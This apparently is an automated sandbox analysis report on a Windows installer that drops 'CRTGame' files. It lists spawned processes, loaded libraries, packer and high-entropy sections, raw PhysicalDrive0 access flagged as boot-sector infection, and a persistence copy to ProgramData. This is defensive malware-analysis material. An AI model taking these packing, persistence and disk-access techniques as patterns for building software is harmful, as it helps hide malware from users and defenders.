Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Process created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -i
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" helpmsg 10
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Process created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -s
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10
Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exe	Process created: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp "C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp" /SL5="$1043A,6985375,54272,C:\Users\user\Desktop\Mg5bMQ2lWi.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Query	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Process created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -i	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" helpmsg 10	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Process created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -s	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10	Jump to behavior

Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp

Window found: window name: TMainForm

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Mg5bMQ2lWi.exe

Static file information: File size 7240000 > 1048576

Source:	Binary string: X:\delphi\xrecode3\src\c\DLL\visualc\libmp4v2\bin\Windows-Win32\Release\libmp4v2.pdb source: is-OGODD.tmp.1.dr
Source:	Binary string: D:\lame-3.100-SVN-20200409\Dll\Win32\Release NASM\lame_enc.pdb source: is-1CHIA.tmp.1.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

Unpacked PE file: 4.2.crtgame.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.hsave:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Program Files (x86)\CRTGame\crtgame.exe

Unpacked PE file: 4.2.crtgame.exe.400000.0.unpack

Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp

Code function: 1_2_0044C030 LoadLibraryA,GetProcAddress,GetProcAddress,

1_2_0044C030

Source: initial sample

Static PE information: section where entry point is pointing to: petite

Source: crtgame.exe.1.dr	Static PE information: section name: .hsave
Source: is-63DO2.tmp.1.dr	Static PE information: section name: /4
Source: is-83310.tmp.1.dr	Static PE information: section name: /4
Source: is-CA2OV.tmp.1.dr	Static PE information: section name: /4
Source: is-PBK8V.tmp.1.dr	Static PE information: section name: /4
Source: is-PBK8V.tmp.1.dr	Static PE information: section name: /19
Source: is-PBK8V.tmp.1.dr	Static PE information: section name: /31
Source: is-PBK8V.tmp.1.dr	Static PE information: section name: /45
Source: is-PBK8V.tmp.1.dr	Static PE information: section name: /57
Source: is-PBK8V.tmp.1.dr	Static PE information: section name: /70
Source: is-PBK8V.tmp.1.dr	Static PE information: section name: /81
Source: is-PBK8V.tmp.1.dr	Static PE information: section name: /92
Source: is-1CHIA.tmp.1.dr	Static PE information: section name: .trace
Source: is-1CHIA.tmp.1.dr	Static PE information: section name: _RDATA
Source: is-1CHIA.tmp.1.dr	Static PE information: section name: .debug_o
Source: is-UG8V7.tmp.1.dr	Static PE information: section name: /4
Source: is-04UN3.tmp.1.dr	Static PE information: section name: /4
Source: is-6JHM7.tmp.1.dr	Static PE information: section name: /4
Source: is-GKK7D.tmp.1.dr	Static PE information: section name: /4
Source: is-EQ4MD.tmp.1.dr	Static PE information: section name: /4
Source: is-EI90O.tmp.1.dr	Static PE information: section name: /4
Source: is-GRQ3N.tmp.1.dr	Static PE information: section name: /4
Source: is-EI0VO.tmp.1.dr	Static PE information: section name: /4
Source: is-HI2BI.tmp.1.dr	Static PE information: section name: /4
Source: is-M7CIT.tmp.1.dr	Static PE information: section name:
Source: is-M7CIT.tmp.1.dr	Static PE information: section name:
Source: is-M7CIT.tmp.1.dr	Static PE information: section name: petite
Source: is-JMEV2.tmp.1.dr	Static PE information: section name: /4
Source: is-J3HC1.tmp.1.dr	Static PE information: section name:
Source: is-J3HC1.tmp.1.dr	Static PE information: section name:
Source: is-J3HC1.tmp.1.dr	Static PE information: section name: petite
Source: is-C877S.tmp.1.dr	Static PE information: section name:
Source: is-C877S.tmp.1.dr	Static PE information: section name:
Source: is-C877S.tmp.1.dr	Static PE information: section name: petite
Source: is-LTIA8.tmp.1.dr	Static PE information: section name:
Source: is-LTIA8.tmp.1.dr	Static PE information: section name: petite
Source: is-AT6AE.tmp.1.dr	Static PE information: section name:
Source: is-AT6AE.tmp.1.dr	Static PE information: section name:
Source: is-AT6AE.tmp.1.dr	Static PE information: section name: petite
Source: is-BA6TO.tmp.1.dr	Static PE information: section name: /4
Source: is-1KFVE.tmp.1.dr	Static PE information: section name: .sxdata
Source: is-FBHLC.tmp.1.dr	Static PE information: section name: .didata
Source: is-001GJ.tmp.1.dr	Static PE information: section name:
Source: is-001GJ.tmp.1.dr	Static PE information: section name:
Source: is-001GJ.tmp.1.dr	Static PE information: section name: petite
Source: is-MJ59N.tmp.1.dr	Static PE information: section name:
Source: is-MJ59N.tmp.1.dr	Static PE information: section name: petite
Source: is-3DBAJ.tmp.1.dr	Static PE information: section name:
Source: is-3DBAJ.tmp.1.dr	Static PE information: section name:
Source: is-3DBAJ.tmp.1.dr	Static PE information: section name:
Source: is-P0GV3.tmp.1.dr	Static PE information: section name:
Source: is-P0GV3.tmp.1.dr	Static PE information: section name:
Source: is-P0GV3.tmp.1.dr	Static PE information: section name: petite
Source: is-C9QMS.tmp.1.dr	Static PE information: section name:
Source: is-C9QMS.tmp.1.dr	Static PE information: section name:
Source: is-C9QMS.tmp.1.dr	Static PE information: section name:
Source: is-40N44.tmp.1.dr	Static PE information: section name:
Source: is-40N44.tmp.1.dr	Static PE information: section name:
Source: is-40N44.tmp.1.dr	Static PE information: section name: petite
Source: is-KR7LG.tmp.1.dr	Static PE information: section name:
Source: is-KR7LG.tmp.1.dr	Static PE information: section name:
Source: is-KR7LG.tmp.1.dr	Static PE information: section name: petite
Source: is-HVEOK.tmp.1.dr	Static PE information: section name:
Source: is-HVEOK.tmp.1.dr	Static PE information: section name:
Source: is-HVEOK.tmp.1.dr	Static PE information: section name:
Source: is-L705K.tmp.1.dr	Static PE information: section name:
Source: is-L705K.tmp.1.dr	Static PE information: section name:
Source: is-L705K.tmp.1.dr	Static PE information: section name: petite
Source: is-NJ7JN.tmp.1.dr	Static PE information: section name: /4
Source: is-DMP2Q.tmp.1.dr	Static PE information: section name: /4
Source: is-JB8NH.tmp.1.dr	Static PE information: section name: /4
Source: is-ITM21.tmp.1.dr	Static PE information: section name: /4
Source: is-44UDD.tmp.1.dr	Static PE information: section name:
Source: is-44UDD.tmp.1.dr	Static PE information: section name:
Source: is-44UDD.tmp.1.dr	Static PE information: section name:
Source: is-DFCBR.tmp.1.dr	Static PE information: section name: /4
Source: is-GUEH6.tmp.1.dr	Static PE information: section name: .eh_fram
Source: is-060C4.tmp.1.dr	Static PE information: section name: asmcode
Source: is-D14K1.tmp.1.dr	Static PE information: section name: .eh_fram
Source: is-GSP1P.tmp.1.dr	Static PE information: section name: /4
Source: is-VP35T.tmp.1.dr	Static PE information: section name: /4
Source: is-B8HMN.tmp.1.dr	Static PE information: section name: /4
Source: TAudioClass.exe.4.dr	Static PE information: section name: .hsave

Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exe	Code function: 0_2_004065B8 push 004065F5h; ret	0_2_004065ED
Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exe	Code function: 0_2_004040B5 push eax; ret	0_2_004040F1
Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exe	Code function: 0_2_00408104 push ecx; mov dword ptr [esp], eax	0_2_00408109
Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exe	Code function: 0_2_00404185 push 00404391h; ret	0_2_00404389
Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exe	Code function: 0_2_00404206 push 00404391h; ret	0_2_00404389
Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exe	Code function: 0_2_0040C218 push eax; ret	0_2_0040C219
Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exe	Code function: 0_2_004042E8 push 00404391h; ret	0_2_00404389
Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exe	Code function: 0_2_00404283 push 00404391h; ret	0_2_00404389
Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exe	Code function: 0_2_00408F38 push 00408F6Bh; ret	0_2_00408F63
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00409954 push 00409991h; ret	1_2_00409989
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_0040A04F push ds; ret	1_2_0040A050
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_0040A023 push ds; ret	1_2_0040A04D
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_004062CC push ecx; mov dword ptr [esp], eax	1_2_004062CD
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_004822F4 push 004823D2h; ret	1_2_004823CA
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_004765B0 push ecx; mov dword ptr [esp], edx	1_2_004765B1
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_004106E0 push ecx; mov dword ptr [esp], edx	1_2_004106E5
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00412938 push 0041299Bh; ret	1_2_00412993
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_004589F0 push 00458A34h; ret	1_2_00458A2C
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00442C94 push ecx; mov dword ptr [esp], ecx	1_2_00442C98
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_00450E58 push 00450E8Bh; ret	1_2_00450E83
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_0045101C push ecx; mov dword ptr [esp], eax	1_2_00451021
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_0040D038 push ecx; mov dword ptr [esp], edx	1_2_0040D03A
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_0049310C push ecx; mov dword ptr [esp], ecx	1_2_00493111
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_004571B0 push 004571E8h; ret	1_2_004571E0
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_0045F444 push ecx; mov dword ptr [esp], ecx	1_2_0045F448
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_0040546D push eax; ret	1_2_004054A9
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_0040553D push 00405749h; ret	1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_0040F598 push ecx; mov dword ptr [esp], edx	1_2_0040F59A
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_004055BE push 00405749h; ret	1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_0040563B push 00405749h; ret	1_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	Code function: 1_2_004056A0 push 00405749h; ret	1_2_00405741

Source: crtgame.exe.1.dr	Static PE information: section name: .text entropy: 7.587380705080058
Source: is-3DBAJ.tmp.1.dr	Static PE information: section name: entropy: 7.953893773659523
Source: is-C9QMS.tmp.1.dr	Static PE information: section name: entropy: 7.921519965168042
Source: is-KR7LG.tmp.1.dr	Static PE information: section name: entropy: 7.966771808365004
Source: is-HVEOK.tmp.1.dr	Static PE information: section name: entropy: 7.950928332152424
Source: is-44UDD.tmp.1.dr	Static PE information: section name: entropy: 7.491817342209834
Source: TAudioClass.exe.4.dr	Static PE information: section name: .text entropy: 7.587380705080058

Persistence and Installation Behavior

Contains functionality to infect the boot sector

Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0		4_2_00401A58
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0		6_2_02C2F2AF

Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-FJDCA.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\uninstall\is-TGPT7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Users\user\AppData\Local\Temp\is-V1CVR.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-M7CIT.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-40N44.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-060C4.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\takdec.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-001GJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\lame_enc.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-DFCBR.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-JB8NH.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-EQ4MD.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-ISCOD.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Users\user\AppData\Local\Temp\is-V1CVR.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-KR7LG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-LTIA8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-AT6AE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-HI2BI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-4LN2K.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-44UDD.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Users\user\AppData\Local\Temp\is-V1CVR.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-L705K.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-HVEOK.tmp	Jump to dropped file
Source: C:\Program Files (x86)\CRTGame\crtgame.exe	File created: C:\ProgramData\TAudioClass\TAudioClass.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-J3HC1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\is-CA2OV.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\sd.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp	File created: C:\Program Files (x86)\CRTGame\bin\x86\rg_ebur128.dll (copy)	Jump to dropped file
